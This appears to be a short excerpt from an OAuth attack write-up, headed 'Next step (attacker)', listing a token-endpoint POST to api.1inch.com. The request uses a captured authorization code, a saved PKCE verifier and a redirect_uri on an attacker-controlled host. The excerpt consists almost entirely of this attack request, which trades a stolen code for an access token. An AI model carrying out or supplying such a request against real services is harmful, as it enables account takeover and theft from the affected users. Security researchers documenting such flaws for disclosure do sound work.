Next step (attacker):
POST https://api.1inch.com/oauth/token with:
- grant_type=authorization_code
- code=[captured code]
- client_id=[registered client_id]
- code_verifier=[saved verifier]
- redirect_uri=https://attack.netfragile.store/callback